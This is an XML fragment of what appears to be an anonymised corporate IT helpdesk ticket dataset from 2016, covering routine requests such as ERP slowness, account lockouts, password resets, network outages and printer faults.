    <s v="_x000a__x000a_received from: kugwsrjz.xnygwtle@gmail.com_x000a__x000a_erp has been very slow and takes more than 30 seconds to execute a transaction_x000a__x000a_gurhyqsath j_x000a_india_x000a_kugwsrjz.xnygwtle@gmail.com&lt;mailto:kugwsrjz.xnygwtle@gmail.com&gt;_x000a_"/>
    <s v="isuclrnw hxrtkiws"/>
    <x v="13"/>
  </r>
  <r>
    <s v="apac company:fastethernet0/48 - company-ap-chn-apac-shop-closet-2960-access-sw01 is down since at 20:03 et on 09/21"/>
    <s v="apac company:  company-ap-chn-apac-shop-closet-2960-access-sw01.company.com  -    fastethernet0/48 Â· uplink to company-ap-chn-apac-2950-24-access-sw05 since at 20:03 et on 09/21"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="security_tool notification: password verification failure for monitoring_tool azure server clhqsm029"/>
    <s v="from: ugyothfz ugrmkdhx _x000a_sent: thursday, september 22, 2016 8:37 am_x000a_to: ntteam &lt;ntteam@company.com&gt;; stefyty dabhruji &lt;slzhuipc.sqntcber@gmail.com&gt;; xomkhzrq vytqlphd &lt;boxrlpec.fnkhwytl@gmail.com&gt;; datacenter &lt;datacenter@company.com&gt;_x000a_cc: bhayhtrathramdnty mamilujli &lt;bhayhtrathramdnty mamilujli@company.com&gt;; gzhapcld fdigznbk &lt;rubiargty.fatgrtyma@company.com&gt;; hnynhsth jsuyhwssad &lt;bxspwfyo.vzystwor@gmail.com&gt;; kathght shfhyw &lt;afkstcev.utbnkyop@gmail.com&gt;_x000a_subject: clhqsm029 : notification: password verification failure_x000a__x000a_hello windows server support, nvyjtmca xjhpznds operations,_x000a__x000a_we have received a password verification failure in security_tool when attempting to connect to the monitoring_tool azure server clhqsm029. it looks like this server exits in the company domain, but we are unable to connect to this server._x000a__x000a_please find the log details in the alert below and confirm if the server is still active or decommissioned. "/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="apac- china and apac plant have reported erp slowness"/>
    <s v="apac- china and apac plant have reported erp slowness"/>
    <s v="obuwfnkm ufpwmybi"/>
    <x v="13"/>
  </r>
  <r>
    <s v="acct 70939408"/>
    <s v="_x000a__x000a_received from: nkthumgf.mwgdenbs@gmail.com_x000a__x000a_this account was extended to div. 02 in crm on tuesday but the new extension has not replicated to SID_34 yet.  please advise._x000a__x000a_nkthumgf mwgdenbs_x000a_nkthumgf.mwgdenbs@gmail.com&lt;mailto:nkthumgf.mwgdenbs@gmail.com&gt;_x000a_ph: _x000a__x000a__x000a_"/>
    <s v="nkthumgf mwgdenbs"/>
    <x v="14"/>
  </r>
  <r>
    <s v="outlook isue : user called back."/>
    <s v="_x000d__x000a__x000d__x000a_received from: vxzahrlc.frtkpehy@gmail.com_x000d__x000a__x000d__x000a_i keep having to restart outlook and my computer._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vxzahrlc frtkpehy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell 7350: sound issue."/>
    <s v="dell 7350: sound issue._x000d__x000a_-connected to the user system using teamviewer._x000d__x000a_-installed the sound drivers._x000d__x000a_-restarted the pc.sound is working fine now._x000d__x000a_-issue resolved."/>
    <s v="nyjvwsxf npwoglzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job SID_47filesys failed in job_scheduler at: 09/21/2016 17:49:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_47filesys failed in job_scheduler at: 09/21/2016 17:49:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="my account (user = morhyerw) is being repeatedly locked.  please run a trace to determine the cause."/>
    <s v="for the past two days, my account has been repeatedly locked.  i have not been entering the wrong password thrgxqsuojr xwbesorfs in a row on my pc (10.170.3.189).  keyhtyvin toriaytun has unlocked it several times.  keyhtyvin has asked me to request a trace to determine what is causing my account to be locked."/>
    <s v="kdjfhwua arfpnhbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not launching."/>
    <s v="outlook not launching._x000a_-connected to the user system using teamviewer._x000a_-uninstalled and reinstalled mscrm._x000a_-restarted the pc._x000a_-caller confirmed that he is now able to see the emails on outlook._x000a_-issue resolved._x000a_"/>
    <s v="huaxlyfi lqvamnbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="workflow"/>
    <s v="_x000a__x000a_received from: nealxjbc.owjduxai@gmail.com_x000a__x000a_i used to be the supervisor over usa.  in july this was changed to efqhmwpj tgeynlvr being the supervisor over that location.  credit memo's and returns are still coming to my workflow and i have to forward to them.  today i was informed that nuhfwplj ojcwxser is now the team lead over usa/ usa/usa and these should be sent to her.  can you update erp so these get routed properly?_x000a__x000a_nealxjbc owjduxai_x000a_customer service supervisor_x000a_nealxjbc.owjduxai@gmail.com&lt;mailto:nealxjbc.owjduxai@gmail.com&gt;_x000a__x000a__x000a_"/>
    <s v="nealxjbc owjduxai"/>
    <x v="12"/>
  </r>
  <r>
    <s v="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ugrnzjpy utbswegc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to vpn,"/>
    <s v="not able to login to vpn,_x000d__x000a_-advised the caller to restart the system and check the internet connection._x000d__x000a_updated the drivers._x000d__x000a_-advised the caller to logon to the company vpn._x000d__x000a_-caller confirmed that he was able to login._x000d__x000a_-issue resolved."/>
    <s v="zidbmyut esmbcxor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network problems (multiple applications are running slow)"/>
    <s v="how did you determine there are network problems ? error: web page not recovering in mii_x000d__x000a__x000d__x000a_is only erp slow ? (please use the quick ticket within the erp folder if only erp is running slow) erp mii_x000d__x000a__x000d__x000a_are more than one transactions impacted? operator dashbankrd_x000d__x000a__x000d__x000a_what erp server are you on (server name is located in the status bar at the bottom _x000d__x000a_right of your screen) ? SID_34_x000d__x000a__x000d__x000a_do other co-workers also notice slow response times in erp ? yes. it happened on multiple machines_x000d__x000a__x000d__x000a_what other applications are running slow ? mii is the only application available to operators_x000d__x000a__x000d__x000a_can you access your data files on the server ?_x000d__x000a__x000d__x000a_any other comments or issues with other systems ? this slow response happens during shift change when a lot of activity on the system. 645-715 and 245-315"/>
    <s v="juaxnvwz reampilj"/>
    <x v="40"/>
  </r>
  <r>
    <s v="vip 1: please add me to the allowed sender list for the usx team members."/>
    <s v="please add me to the allowed sender list for the usx team members."/>
    <s v="hkrecpfv kgwpbexv"/>
    <x v="26"/>
  </r>
  <r>
    <s v="engineering_tool not working"/>
    <s v="name:mikhghytr_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vcyktjxp.uxdojvrq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cant load the company home page or engineering_tool"/>
    <s v="vcyktjxp uxdojvrq"/>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cawuojrb trwsilgq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="call came and got disconnected"/>
    <s v="call came and got disconnected"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update passwords on all accounts"/>
    <s v="unable to update passwords on all accounts"/>
    <s v="nesmdkpr dcaqoxsy"/>
    <x v="0"/>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jvshydix rzpmnylt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot print to prtqx1248 on pc rqxw8514035 anymore, prints stall in print queue."/>
    <s v="cannot print to prtqx1248 on pc rqxw8514035 anymore, prints stall in print queue."/>
    <s v="mfrsgwnk wremyjlo"/>
    <x v="2"/>
  </r>
  <r>
    <s v="request to remove 1 day pick route logic from supply_chain for customers 81163582 &amp; 81183209 in plant_101 view."/>
    <s v="name:xnqzhtwu hivumtfz_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xnqzhtwu.hivumtfz@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:request to remove 1 day pick route logic from supply_chain for customer 81163582 in plant_101 view."/>
    <s v="xnqzhtwu hivumtfz"/>
    <x v="17"/>
  </r>
  <r>
    <s v="computer crashed after a reboot"/>
    <s v="computer crashed after a reboot"/>
    <s v="zstkagwu jlyrhdcf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to outlook"/>
    <s v="name:mikhghytr_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:vcyktjxp.uxdojvrq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i cant connect to outlook"/>
    <s v="vcyktjxp uxdojvrq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update inplant_862604"/>
    <s v="ticket update inplant_862604"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="email search option issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xyculgav.cuqptoah@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am not able to search emails using from or subject option as only few of the cases come._x000d__x000a_hence it is becoming very difficult to retrieve past details which is required for many reference ._x000d__x000a__x000d__x000a_plus the address book details are also not sync automatically ._x000d__x000a__x000d__x000a_pl help in fixing the same._x000d__x000a__x000d__x000a_"/>
    <s v="xyculgav cuqptoah"/>
    <x v="18"/>
  </r>
  <r>
    <s v="r: ticket_no1402627 change in report zsdslsum -  last email"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xawlkiey.demjqrfl@gmail.com_x000d__x000a__x000d__x000a_pethrywr, lauthry_x000d__x000a_sorry but i'm still waiting your confirmation that this was agreed globally within finance team (am, emea, apac) in order to move on ._x000d__x000a_this is not an otc report, it's only used by your finance team._x000d__x000a__x000d__x000a_if i'm not receiving a confirmation, i'm sorry but i have to cancel the ticket. i'll will wait till oct.15, 2016 then i have to cancel._x000d__x000a__x000d__x000a_hope you comprehend._x000d__x000a__x000d__x000a_"/>
    <s v="xawlkiey demjqrfl"/>
    <x v="64"/>
  </r>
  <r>
    <s v="account expired for user coumikzb ubfcwegt"/>
    <s v="account expired for user coumikzb ubfcwegt_x000a__x000a_user id -viruhytph"/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="company emails on personal smartphone"/>
    <s v="company emails on personal smartphone"/>
    <s v="pjnlxcrm kizumjot"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa:interface down on tengigabitethernet1/5 tech-4500x (a)-(10.1.200.2) since at 10:28 am et on 09/21. "/>
    <s v="interface down - on   tengigabitethernet1/5 Â· connection to tech-4500x (a) - (10.1.200.2) ._x000d__x000a_interface down - on   tengigabitethernet1/1/1 Â· dr l3 connection to 6500 top (10.1.200.1)"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="dell 7350:sound issue with skype calls."/>
    <s v="dell 7350:sound issue with skype calls._x000a_-connected to the user system using teamviewer._x000a_-upgraded the system bios._x000a_-restarted the pc.checked the skype audio settings._x000a_-gave a uacyltoe hxgaycze call to the user through skype._x000a_-audio is now working fine._x000a_contact : "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="berechtigung fÃ¼r ordner einrichten"/>
    <s v="ich benÃ¶tige fÃ¼r folgende personen aus germany die angegeben berechtigung fÃ¼r den ordner: \\HostName_705\teams\schlammversand-sludgeshipping._x000a__x000a_nur leseberechtigung:_x000a_b. hoscgthke / pl metallurgie_x000a_th. langhdte / pl schneidkÃ¶rper_x000a_g. hbyoyer / pl stÃ¤befertigung_x000a_b. dahytrda / sv distribution_x000a_d. retzkowski / controlling_x000a_b. chsbhuo / controlling_x000a_"/>
    <s v="xtfniscy ecoyksda"/>
    <x v="32"/>
  </r>
  <r>
    <s v="requesting un-install and re-install of excel 2013"/>
    <s v="i am currently running into issues with my &quot;context menu&quot; which is displayed when i right click in an excel document. the menu does not pop-up in any of my excel documents, and i frequently use it to format cells when working in files. please assist, "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_862569"/>
    <s v="ticket update on inplant_862569"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call "/>
    <s v="blank call "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call "/>
    <s v="blank call "/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect projector"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aljbtwsh.lepkbgix@gmail.com_x000d__x000a__x000d__x000a_dear sir/ ma'am,_x000d__x000a__x000d__x000a_i am unable to connect the projector on my system._x000d__x000a__x000d__x000a_with best "/>
    <s v="aljbtwsh lepkbgix"/>
    <x v="18"/>
  </r>
  <r>
    <s v="windows password reset"/>
    <s v="windows password reset"/>
    <s v="khsilgon tpyeucvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mii password reset"/>
    <s v="mii password reset"/>
    <s v="ycazngpi mdsqixlr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1387 failed in job_scheduler at: 09/21/2016 11:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1387 failed in job_scheduler at: 09/21/2016 11:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="erp access issue - SID_1"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_1_x000a__x000a_enter user id of user having the issue: nehsytwrrej_x000a__x000a_transaction code(s) the user needs or was working with: grwtfer_x000a__x000a_describe the issue:_x000a_see attachment_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a_attached_x000a__x000a_provide access the same as this other user:"/>
    <s v="slubnjry qcrabvoe"/>
    <x v="19"/>
  </r>
  <r>
    <s v="re: need a little help--please"/>
    <s v="_x000a__x000a_received from: damuphws.arkulcoi@gmail.com_x000a__x000a_good morning:_x000a_   yes, we use z_chk in usa as well._x000a__x000a_have a good day.._x000a_damuphws arkulcoi_x000a_shipping/inventory specialist_x000a_company, inc._x000a__x000a_damuphws.arkulcoi@gmail.com_x000a__x000a__x000a_from: smxoklny hbecskgl_x000a_sent: wednesday, september 21, 2016 10:04 am_x000a_to: chnagdrtymk an; damuphws arkulcoi; company@ticketing_tool.com_x000a_cc: eples_x000a_subject: re: need a little help--please_x000a__x000a_chahdtyru,_x000a_            i have confirmed that usa is using z_chk to process._x000a__x000a__x000a_best "/>
    <s v="damuphws arkulcoi"/>
    <x v="17"/>
  </r>
  <r>
    <s v="ç­”å¤: ç­”å¤: order products online problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fkdazsmi.yecbrofv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i will ask your help if i can't solve it with the help of my boss tomorrow. "/>
    <s v="fkdazsmi yecbrofv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // gso loud noise"/>
    <s v="blank call // gso loud noise"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ç­”å¤: ç­”å¤: order products online problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fkdazsmi.yecbrofv@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i will ask your help if i can't solve it with the help of my boss tomorrow. "/>
    <s v="fkdazsmi yecbrofv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_1 account locked out"/>
    <s v="erp SID_1 account locked out"/>
    <s v="iauqlrjk nijdaukz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="re: need a little help--please"/>
    <s v="_x000a__x000a_received from: smxoklny.hbecskgl@gmail.com_x000a__x000a_chandruhdty,_x000a_            i have confirmed that usa is using z_chk to process._x000a__x000a__x000a_best "/>
    <s v="khvzugxm yqfrcjwl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="laptop not booting up"/>
    <s v="laptop not booting up"/>
    <s v="lzqbyner jyncfahz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0442388"/>
    <s v="ticket update on ticket_no0442388"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to check if sdlixwmb zvygmnco's account is locked"/>
    <s v="need to check if sdlixwmb zvygmnco's account is locked"/>
    <s v="pvlxjizg xzvlwqjc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hwbipgfq.sqiyfdax@gmail.com called to check how to change the lanhuage of office"/>
    <s v="hwbipgfq.sqiyfdax@gmail.com called to check how to change the lanhuage of office"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to update passwords "/>
    <s v="unable to update passwords "/>
    <s v="hawrkqnp sjwrgakp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip2: erp SID_34 account unlock"/>
    <s v="vip2: erp SID_34 account unlock"/>
    <s v="usqrpicf dfmxaliz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm configuration and password reset"/>
    <s v="crm configuration and password reset"/>
    <s v="tgewaniq yepifgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="general enquiry about engineering_tool installation on windows xp"/>
    <s v="general enquiry about engineering_tool installation on windows xp"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage :canada, ontario - (company):site is hard down since at 10:01 am et on 09/21."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______10:01 am et on 09/21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no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erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="bjtguqne xthqrzpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please activate my new company owned samsung s7 galaxy for office 365 access"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nwfoucba.dzbujamc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please activate my new company owned samsung s7 galaxy for office 365 access:_x000d__x000a__x000d__x000a_gerÃ¤temodell:_x000d__x000a__x000d__x000a_sm-g930f_x000d__x000a__x000d__x000a_gerÃ¤tetyp:_x000d__x000a__x000d__x000a_samsungsmg930f_x000d__x000a__x000d__x000a_gerÃ¤te-id:_x000d__x000a__x000d__x000a_sec1e1f38f42937a_x000d__x000a__x000d__x000a_gerÃ¤tebetriebssystem:_x000d__x000a__x000d__x000a_android 6...1_x000d__x000a__x000d__x000a_gerÃ¤tebenutzer-agent:_x000d__x000a__x000d__x000a_android-samsung-sm-g930f/101.60001_x000d__x000a__x000d__x000a_gerÃ¤te-imei:_x000d__x000a__x000d__x000a_353555080301662_x000d__x000a__x000d__x000a_exchange activesync-version:_x000d__x000a__x000d__x000a_14.1_x000d__x000a__x000d__x000a_gerÃ¤tezugriffsstatus:_x000d__x000a__x000d__x000a_quarantined_x000d__x000a__x000d__x000a_grund fÃ¼r gerÃ¤tezugriffsstatus:_x000d__x000a__x000d__x000a_global_x000d__x000a__x000d__x000a__x000d__x000a_you can remove the existing samsung galaxy s5 device from my account, but do not remove any other devices that have access to my account._x000d__x000a_"/>
    <s v="nwfoucba dzbujamc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load outlook "/>
    <s v="unable to load outlook "/>
    <s v="tgewaniq yepifgbl"/>
    <x v="0"/>
  </r>
  <r>
    <s v=".companyfoundation@kcompany.com and .relations@company.com but doesn't work"/>
    <s v="need to add two mailboxes to outlook (still working with outlook 2010) .companyfoundation@kcompany.com and .relations@company.com but doesn't work"/>
    <s v="fmjeaoih ndyezlkb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="drucker wk20 defekt"/>
    <s v="drucker wk20 defekt"/>
    <s v="xgejlvkn msbunvpx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="password reset as it is expired"/>
    <s v="password reset as it is expired"/>
    <s v="zylwdbig wdkbztjp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="modify teamsales sproc to calculate full ytd instead of delta"/>
    <s v="the current team sproc calculates a delta value and adds it in to the previous period ytd sales to get the full ytd sales. this needs to be changed. instead of calculating a delta, the procedure will calculate a true ytd number by applying current allocations percentages retroactively and by summing all direct revenue and adjustments together."/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="infopath links to discount forms do not open"/>
    <s v="hello,_x000d__x000a_discount team in poznaÅ„ is unable to open discount request forms from links in our inboxes - error occurs - this hugely impacts the team's productivity - please address as soon as possible. attached are two print screens - one with an example of said links, one with the error that occurs when trying to open a discount form."/>
    <s v="ahydmrbu fjymgtvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to load erp"/>
    <s v="unable to load erp"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="recall: ticket_no1551667 - due date has been updated to 09-30-2016 09:16:47 edt"/>
    <s v="_x000d__x000a__x000d__x000a_received from: riqmdnzs.mtlghwex@gmail.com_x000d__x000a__x000d__x000a_riqmdnzs mtlghwex would like to recall the message, &quot;ticket_no1551667 - due date has been updated to 09-30-2016 09:16:47 edt&quot;._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="riqmdnzs mtlghwex"/>
    <x v="19"/>
  </r>
  <r>
    <s v="connect 2 in 1 to companysecure"/>
    <s v="connect 2 in 1 to companysecure"/>
    <s v="hmgbwyce sacuoyfe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to get on network drives"/>
    <s v="unable to get on network drives"/>
    <s v="jrxsdcna iyhktobe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="wsomjgqe osyicmxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked."/>
    <s v="account locked."/>
    <s v="znyijvpg kjqhrwlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot provide data into crm"/>
    <s v="i can't provide information in crm - during working on it , website is stopping my job and showing that kind of alert which i have attached. it's happening from yesterday to today every second or every time when i am starting fill data.  this has worked before just started happening_x000d__x000a_"/>
    <s v="lmsxcvoz vzhkdpfn"/>
    <x v="14"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="due to new hardware usa access to exchange account."/>
    <s v="die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird."/>
    <s v="wjbanovh mohgutiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erro programdntya docad"/>
    <s v="please, this problem is related it south_amerirtca._x000d__x000a__x000d__x000a_"/>
    <s v="lokiwfhg udkoqrcg"/>
    <x v="62"/>
  </r>
  <r>
    <s v="loop back ip for primary router at erkheim went unreachable"/>
    <s v="loop back ip for primary router at erkheim went unreachable"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="3"/>
  </r>
  <r>
    <s v="account lock out."/>
    <s v="account lock out."/>
    <s v="pmgzhivt shexujmb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot open new lean tracker form"/>
    <s v="_x000d__x000a__x000d__x000a_received from: saerpwno.qsdfmakc@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_greetings for the day..!_x000d__x000a__x000d__x000a_please help me to open the fy17 &quot;add a lean event&quot; form. when i tried to open it i got the following message it said me to update my infopath with newer version._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_3542b.d1ad7200]_x000d__x000a__x000d__x000a_"/>
    <s v="saerpwno qsdfmakc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="monitor in der stÃ¤be-endkontrolle defekt"/>
    <s v="monitor in der stÃ¤be-endkontrolle defekt"/>
    <s v="kiqrvwat gwkpxzyt"/>
    <x v="32"/>
  </r>
  <r>
    <s v="user password"/>
    <s v="_x000d__x000a__x000d__x000a_received from: bswlorek.yhdrlgbs@gmail.com_x000d__x000a__x000d__x000a_hi team,_x000d__x000a__x000d__x000a_could you please reset password from user â€ždw0021&quot; to daypay3?_x000d__x000a_the user forgot her password._x000d__x000a__x000d__x000a_"/>
    <s v="bswlorek yhdrlgbs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bwa index for bw queries failed due to bwa server is overloaded"/>
    <s v="dear team,_x000d__x000a__x000d__x000a_we are facing errors in bwa indexing of quer) in SID_37 due to bwa server is over loaded error. i have checked the filters for those queries and it is only for 3 months' data (fy 17)._x000d__x000a__x000d__x000a_please suggest if all the servers (bwa) are not overloaded and operating fine and request to provide a resolution at an earliest._x000d__x000a__x000d__x000a_"/>
    <s v="vthuzanc fqdgotvx"/>
    <x v="13"/>
  </r>
  <r>
    <s v="problems with creating pgi in transaction vl02n, because we can't enter the batch"/>
    <s v="problems with creating pgi in transaction vl02n, because we can't enter the batch when we need it, and every time when we need enter the batch we asking about it our german warehouse colleagues. they sad us, that this function are locked in my erp account. could you help me please?"/>
    <s v="alenrdvz mhglqndp"/>
    <x v="17"/>
  </r>
  <r>
    <s v="maus defekt ."/>
    <s v="hallo ,_x000d__x000a_ich und howfanzi siavgtby  brauchen eine neue anstÃ¤ndige maus._x000d__x000a_wÃ¤hre schÃ¶n wenn du sie kurzfristig uns vorbei bringen kÃ¶nnuacyltoe hxgaycze._x000d__x000a_"/>
    <s v="tkhaymqg cwuqzyvm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="maus defekt"/>
    <s v="hallo ,_x000d__x000a_ich und howfanzi siavgtby  brauchen eine neue anstÃ¤ndige maus._x000d__x000a_wÃ¤hre schÃ¶n wenn du sie kurzfristig uns vorbei bringen kÃ¶nnuacyltoe hxgaycze._x000d__x000a_"/>
    <s v="howfanzi siavgtby"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit symantec \ konferenzraum stÃ¤be \nozahtbr ubznqpsy"/>
    <s v="probleme mit symantec \ konferenzraum stÃ¤be \nozahtbr ubznqpsy"/>
    <s v="nozahtbr ubznqpsy"/>
    <x v="24"/>
  </r>
  <r>
    <s v="drucker defekt in der qs"/>
    <s v="fehlermeldung   59.fo"/>
    <s v="lxfnwyuv bqmjyprz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="account locked in erp SID_34"/>
    <s v="account locked in erp SID_34"/>
    <s v="phqgtfbn lzdntwpr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn connection"/>
    <s v="_x000d__x000a__x000d__x000a_received from: xwertljy.zrmlhkyq@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_please help me to connect to vpn i am not able to._x000d__x000a_matheywter urgent._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="xwertljy zrmlhkyq"/>
    <x v="18"/>
  </r>
  <r>
    <s v="network outage:india , in-company- carrier:site is hard down since at 6:12 am et on 09/21."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ___no______     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______6:12 am et on 09/21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no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pasword and connection problem"/>
    <s v="i don't reach pasword manager pages. it says security problem for this connection."/>
    <s v="mvhcoqed konjdmwq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for mvhcoqed konjdmwq using password_management_tool password reset."/>
    <s v="the"/>
    <s v="mvhcoqed konjdmwq"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for mvhcoqed konjdmwq using password_management_tool password reset."/>
    <s v="the"/>
    <s v="mvhcoqed konjdmwq"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job Job_1392 failed in job_scheduler at: 09/21/2016 06:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1392 failed in job_scheduler at: 09/21/2016 06:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="HostName_809 : usa plant ups is down at 4 am et on 09/21."/>
    <s v="HostName_809 : usa plant ups is down at 4 am et on 09/21."/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="erp csd cockpit application: condition update not possible"/>
    <s v="erp csd cockpit application: condition update not possible_x000d__x000a_not possible to built up an price record  (21.09.16 gt 11:21)_x000d__x000a_quote 3116246099 line item 10"/>
    <s v="ivcygqta qiovrcal"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="euyvqblc ietfqpga"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_239 : volume: /dev/ora_data2  is over 85% space consumed. space available: 2.9 g"/>
    <s v="HostName_239 : volume: /dev/ora_data2  is over 85% space consumed. space available: 2.9 g_x000d__x000a_"/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="1"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn : roaghyunokepc locked"/>
    <s v="qlhmawgi sgwipoxn : roaghyunokepc locked"/>
    <s v="boithdfa tojwnydh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my SID_1  system is been locked, can you  unlock it."/>
    <s v="my SID_1  system is been locked, can you  unlock it._x000a_my user id is- vvhstyap"/>
    <s v="jdocyzgq gdvmjnso"/>
    <x v="19"/>
  </r>
  <r>
    <s v="collaboration_platform access not going through"/>
